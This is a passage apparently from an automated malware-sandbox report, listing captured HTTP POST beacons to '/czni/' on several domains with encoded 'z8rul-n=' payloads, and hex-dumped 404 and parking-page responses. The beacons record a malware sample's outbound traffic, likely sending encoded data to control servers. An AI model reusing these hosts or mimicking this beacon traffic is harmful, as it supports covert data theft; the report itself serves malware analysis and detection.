51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=PGhZS2c5cUz7VcIYJXaGe-NX6v3Ydtg2A5crLmVVbLoYL7zjjIoV8VfeL45UzySSGdSLOwxfmg61NT3hR3(dm5UHggB7SUPHFHeeQ8USw50llSc-FCPrpSomK9ZhSa4R6qlbHnJLTgPAGVU7(r6FeBwFEF(fSD2jlLYtZ22DcwiAOR7lcQ).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.lakeviewautomation.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lakeviewautomation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lakeviewautomation.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 43 6e 64 5f 35 30 51 36 36 69 6f 5a 4d 63 65 55 52 47 70 43 4f 5a 34 44 4d 63 65 77 4a 67 59 6e 46 74 67 49 38 6d 78 31 45 71 6b 49 37 52 58 5f 6f 55 73 6a 6f 57 43 4e 6f 62 33 69 52 51 31 61 6e 4f 4b 30 41 58 67 74 77 6c 4b 4d 42 4d 48 6a 43 63 6c 39 52 30 71 76 58 43 5a 4e 31 62 62 6e 74 41 75 33 63 48 47 6f 38 6b 31 61 50 73 63 57 7e 30 66 70 50 70 42 59 28 4b 79 6b 33 6f 35 66 32 2d 38 39 6e 65 5a 65 65 48 36 77 75 57 52 5a 75 54 6a 37 47 54 6b 6d 54 44 57 68 48 43 70 47 52 44 6a 5a 47 73 58 64 64 42 51 30 58 33 51 72 67 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=Cnd_50Q66ioZMceURGpCOZ4DMcewJgYnFtgI8mx1EqkI7RX_oUsjoWCNob3iRQ1anOK0AXgtwlKMBMHjCcl9R0qvXCZN1bbntAu3cHGo8k1aPscW~0fpPpBY(Kyk3o5f2-89neZeeH6wuWRZuTj7GTkmTDWhHCpGRDjZGsXddBQ0X3Qrgw).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.dellaone.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.dellaone.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dellaone.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 6b 68 42 39 4a 32 34 33 36 2d 6e 34 51 4f 79 76 31 61 66 35 75 4a 4b 63 46 4f 75 33 65 52 79 75 34 61 4f 44 6a 4d 66 52 49 6a 39 76 6f 51 54 4c 53 4b 67 6c 4a 5f 54 5a 57 39 4b 7a 61 6a 49 45 38 72 46 38 4b 52 62 6b 72 57 68 75 74 38 36 68 32 6e 50 34 5a 68 35 6b 4d 33 30 47 68 4d 39 49 28 46 48 31 6f 4c 78 4e 75 38 77 79 4d 4f 53 54 64 46 32 41 64 5a 67 78 75 4f 43 74 76 51 58 6e 63 70 70 78 52 54 4b 73 4b 57 49 6d 41 59 58 52 79 6b 28 34 38 65 34 70 55 74 38 6b 77 4f 76 36 39 42 6c 41 6f 4f 44 68 74 45 31 6f 5a 61 7a 31 54 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=khB9J2436-n4QOyv1af5uJKcFOu3eRyu4aODjMfRIj9voQTLSKglJ_TZW9KzajIE8rF8KRbkrWhut86h2nP4Zh5kM30GhM9I(FH1oLxNu8wyMOSTdF2AdZgxuOCtvQXncppxRTKsKWImAYXRyk(48e4pUt8kwOv69BlAoODhtE1oZaz1Tw).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.arritalvigo.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.arritalvigo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.arritalvigo.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 32 41 47 54 4c 4e 46 52 72 6a 72 76 75 65 48 69 70 74 52 76 69 61 4d 33 6e 39 35 62 48 72 34 34 6e 54 70 69 78 54 7a 4e 67 66 50 66 47 50 64 2d 7e 45 4c 62 45 5f 69 55 7e 48 64 38 4c 79 76 32 71 71 75 35 7e 57 45 57 42 4b 52 78 54 30 31 70 54 76 48 37 5a 39 46 59 28 39 64 4f 4e 51 4b 4f 44 6c 78 76 6a 65 31 31 41 46 45 63 6b 63 55 75 78 30 74 55 50 5a 34 38 6b 64 69 58 6f 5a 58 37 4f 43 53 49 41 62 46 49 6b 73 6a 65 6c 67 6a 73 31 66 47 73 31 75 59 6c 72 42 6a 4b 4a 34 54 36 38 43 5a 4d 7a 43 6b 50 7a 50 53 64 59 4e 78 4b 6c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=2AGTLNFRrjrvueHiptRviaM3n95bHr44nTpixTzNgfPfGPd-~ELbE_iU~Hd8Lyv2qqu5~WEWBKRxT01pTvH7Z9FY(9dONQKODlxvje11AFEckcUux0tUPZ48kdiXoZX7OCSIAbFIksjelgjs1fGs1uYlrBjKJ4T68CZMzCkPzPSdYNxKlw).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.versusfinances.techConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.versusfinances.techUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.versusfinances.tech/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 75 62 66 36 57 6c 45 4e 62 78 6b 57 37 44 51 51 39 38 58 30 62 55 42 6f 35 47 6d 73 52 78 48 39 67 6c 45 55 51 53 5a 36 36 6c 4f 4a 67 62 7a 46 4d 7a 62 61 6f 5a 57 64 55 6d 57 52 68 6d 56 4f 28 37 4b 31 79 6e 57 71 6b 30 55 57 50 46 33 59 6e 32 41 4d 38 75 47 45 53 65 78 63 48 30 4f 67 68 30 77 37 43 42 42 39 7a 4a 72 47 53 46 45 49 31 50 77 38 36 6a 71 70 30 4a 31 61 33 2d 6f 50 48 45 4f 66 63 49 67 74 78 36 64 52 61 69 6a 67 37 4e 6d 59 78 66 7e 51 68 6f 41 54 76 2d 47 47 31 46 53 4b 36 6c 59 64 78 45 47 51 48 6c 34 55 58 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=ubf6WlENbxkW7DQQ98X0bUBo5GmsRxH9glEUQSZ66lOJgbzFMzbaoZWdUmWRhmVO(7K1ynWqk0UWPF3Yn2AM8uGESexcH0Ogh0w7CBB9zJrGSFEI1Pw86jqp0J1a3-oPHEOfcIgtx6dRaijg7NmYxf~QhoATv-GG1FSK6lYdxEGQHl4UXQ).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.hayethe.siteConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.hayethe.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hayethe.site/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 61 59 33 73 7e 5a 7a 63 38 58 44 63 32 74 37 6b 68 4f 34 73 53 62 55 30 75 35 37 48 42 77 64 30 58 34 38 70 32 46 7e 4a 6c 6c 6e 77 52 6a 69 54 38 35 54 66 6a 32 51 66 57 43 58 6d 6a 4a 32 69 7e 70 6f 6b 42 59 71 55 7e 4a 48 76 56 57 58 6d 32 4d 6e 57 79 35 44 5f 5a 56 4c 5f 46 33 65 64 33 65 41 39 7e 45 71 31 31 66 51 34 4d 43 46 76 69 78 62 35 33 4b 28 4f 69 78 35 38 53 6b 73 4d 77 58 63 4a 4d 34 65 30 46 69 73 64 43 75 7a 77 46 67 5a 5f 5a 75 41 44 45 5a 5a 45 76 55 4c 46 6b 68 48 74 6f 53 55 75 34 4a 4a 38 63 52 6f 48 73 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=aY3s~Zzc8XDc2t7khO4sSbU0u57HBwd0X48p2F~JllnwRjiT85Tfj2QfWCXmjJ2i~pokBYqU~JHvVWXm2MnWy5D_ZVL_F3ed3eA9~Eq11fQ4MCFvixb53K(Oix58SksMwXcJM4e0FisdCuzwFgZ_ZuADEZZEvULFkhHtoSUu4JJ8cRoHsw).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.octohoki.netConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.octohoki.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.octohoki.net/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 31 67 71 65 57 7a 56 79 71 56 50 34 53 30 77 66 68 48 68 67 4b 42 72 35 65 72 62 5f 38 65 28 71 72 6d 6f 32 4a 32 52 54 36 2d 49 33 34 6b 76 34 6b 69 47 6a 78 70 44 65 6a 6f 78 44 58 63 49 47 61 48 58 66 71 66 4a 61 78 56 47 54 69 71 74 36 6d 6a 48 6e 4d 4b 50 2d 79 4f 38 38 51 39 66 6c 47 6d 4c 79 74 68 55 30 52 33 6c 43 37 7a 32 6b 33 5a 7e 31 77 63 48 41 54 37 54 6c 72 46 67 63 79 4c 66 46 59 50 58 64 68 53 6a 6e 49 79 77 61 46 61 47 6f 57 72 54 36 62 74 4a 4d 4f 53 79 67 67 6a 46 46 70 76 77 34 59 32 38 39 51 42 64 32 63 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=1gqeWzVyqVP4S0wfhHhgKBr5erb_8e(qrmo2J2RT6-I34kv4kiGjxpDejoxDXcIGaHXfqfJaxVGTiqt6mjHnMKP-yO88Q9flGmLythU0R3lC7z2k3Z~1wcHAT7TlrFgcyLfFYPXdhSjnIywaFaGoWrT6btJMOSyggjFFpvw4Y289QBd2cw).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.hougou.ruConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.hougou.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hougou.ru/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 42 73 4f 4c 54 71 4b 2d 36 71 57 51 6d 48 41 33 35 73 35 6f 64 54 5a 4c 50 7a 4b 41 4a 6e 56 53 64 63 34 44 71 4c 72 57 51 70 67 43 64 44 75 6a 74 77 62 58 59 2d 78 79 74 46 68 65 65 39 64 75 76 49 4d 45 6e 37 52 6f 61 6f 61 4c 75 6d 56 2d 58 39 7a 4a 75 6b 66 30 63 49 39 6e 32 77 33 6b 54 4f 6c 61 79 50 59 53 45 4e 63 77 49 34 76 33 64 35 75 30 7e 49 63 32 48 50 71 71 35 70 73 52 78 51 46 53 36 6d 73 6f 61 5a 66 2d 62 66 78 37 46 63 36 69 44 77 44 31 52 6d 74 32 6c 31 45 32 67 65 70 7a 74 79 45 38 51 32 48 74 42 61 66 32 5a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=BsOLTqK-6qWQmHA35s5odTZLPzKAJnVSdc4DqLrWQpgCdDujtwbXY-xytFhee9duvIMEn7RoaoaLumV-X9zJukf0cI9n2w3kTOlayPYSENcwI4v3d5u0~Ic2HPqq5psRxQFS6msoaZf-bfx7Fc6iDwD1Rmt2l1E2gepztyE8Q2HtBaf2ZA).
          Source: unknownNetwork traffic detected: IP country count 11
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:39:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:40:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 2d 3b 01 6c 8b a4 ea d8 69 3e d4 49 8a c8 6e 51 08 2e 71 b9 bc 24 37 5a ee b2 bb 4b c9 8c 2d a0 b1 f3 44 8c 18 49 0b b4 08 fa 40 5b 14 fd 54 c0 cf 46 7e 48 fe 0b bb ff a8 67 e6 ee 2e 97 34 29 cb 8a d3 06 15 20 89 bc cf b9 33 67 ce cc 7d d4 8f 76 7c 3b 1a 0f 95 e8 47 03 b7 59 a7 bf c2 76 65 18 36 4a 4e d8 92 1d 39 8c 9c 4d 55 12 ae f4 7a 8d 52 30 2a a1 8d 92 9d 66 7d a0 22 29 ec be 0c 42 15 35 4a 97 2f fd c4 38 8d 3a 2e f5 e4 40 35 4a 43 19 6c 38 5e af 24 6c df 8b 94 87 46 81 ea 05 23 23 c0 98 d3 2d 37 1d b5 35 f4 83 a8 d0 74 cb e9 44 fd 46 47 6d 3a b6 32 f8 4b cd f1 9c c8 91 ae 11 da d2 55 8d 65 0c 11 39 91 ab 9a 5b 5b 5b 66 e4 a3 7f 68 f7 95 e9 7b ae e3 a9 ba a5 eb ea f8 b2 21 02 e5 36 4a 61 34 76 55 d8 57 0a d3 0c 54 c7 91 8d 92 74 dd 92 e8 07 aa 9b 0b cb c2 19 72 14 f9 a6 1d 86 98 62 d2 df c1 32 b2 d6 5d 09 b9 7c cf c4 9f d5 e5 92 20 fd 41 5d 03 d9 53 d6 55 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 21 6e 20 ed 8d 35 6e 70 d1 97 1d d1 10 dd 91 67 47 8e ef 55 aa d7 b6 57 8e 58 c7 ae 5c 69 1e b3 ea 56 3a 48 3a 98 c0 e2 d0 bc 51 9a 3f 4c a5 6c 0d a4 e7 74 55 18 99 ef 87 e5 6a 09 ed 55 10 f8 c1 01 3b d4 c4 32 fa 84 81 dd 28 15 07 82 55 32 2b 8f a2 2e 5b f9 a5 e5 22 c8 c0 70 a4 91 d0 48 f1 70 60 19 17 75 2e ca bb a0 cd ab 96 fd 50 32 53 a7 45 b2 a2 6e 3f 19 2d ed 6b 6d bf 33 ce bc b2 6d 0c 81 33 a1 ff b5 08 7a ad d4 d3 b8 8c 7d 6e f2 a9 d5 ee b5 5c a7 d7 8f 80 65 1a 4b 05 c5 71 b8 71 ab 95 56 d0 90 53 25 7a f4 d4 5f 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 62 a2 f8 77 f1 5e fc 34 7e 18 ef 8a f8 db f8 4e f2 1b 7c bc 1f ef 24 1f 26 37 f0 79 07 bf 7b f1 bd f8 0e 55 df 5b f2 da e1 70 a5 0e 26 d1 9c d3 36 c8 e3 32 3f eb 47 d1 30 3c 6b 59 20 0e 13 d4 a3 1d d9 f3 bb be eb fa 5b c2 f3 fd a1 02 c2 f1 01 3e 0c a4 ab 00 be 28 83 1e 11 52 ab 0d c6 da 28 35 df 7b f3 2d f3 bd cb 75 4b 36 eb 16 96 d0 ac cf ac a3 a7 5a ad 14 90 c6 56 20 87 43 8c 97 ea 76 b6 bc c5 14 d2 82 0b 83 cd 16 36 62 8b f4 fd 30 02 f7 19 61 24 23 c7 86 ee 67 66 9d 52 73 e6 10 64 a2 e5 89 22 66 8c 61 30 a3 95 16 d0 5d 7f b9 59 1f 2e ee db 51 da f9 c0 30 2f 6f a6 7a 3b 68 c6 3b da 52 f1 33 32 61 fc 8c cd fa f8 39 43 66 da 1e 2e 5a 71 7b 14 45 be 17 66 aa c6 92 0b a6 d7 95 10 50 7f 80 fe 5d 3f 68 b1 6d 95 67 13 c0 d2 8a d0 f9 40 b5 60 f5 81 74 d9 0e a9 3a f3 fe b9 ea d2 f6 6c 13 44 91 c2 10 43 d9 e9 c0 42 2d 97 f0 32 8b 37 0a 29 1a 73 d6 56 df 77 42 6b 15 a1 c5 de 68 2c 75 38 b4 cd 8b 38 4b 72 30 5c 41 9f 56 e8 8f 02 5b 35 32 11 28 96 94 9a bf a0 51 08 84 a2 b8 5e 72 97 a2 fc 1c 6c 0a 5e b8 ff 7a 3a fe 40 3a 79 48 ca 5c a5 20 ba 6e 60 79 6a cb 5a 1d 45 83 4c b2 b9 d2 53 3d 45 c5 d1 20 93 7c 89 8a 6c ac 4a 3a 3d af 11 42 51 5e a7 85 b1 f6 5f 68 fc 37 60 e2 df f1 43 91 7c 1c ef 25 9f 26 3
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:40:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 61 38 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 6f 70 6f 72 73 63 68 65 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:19 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:23 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 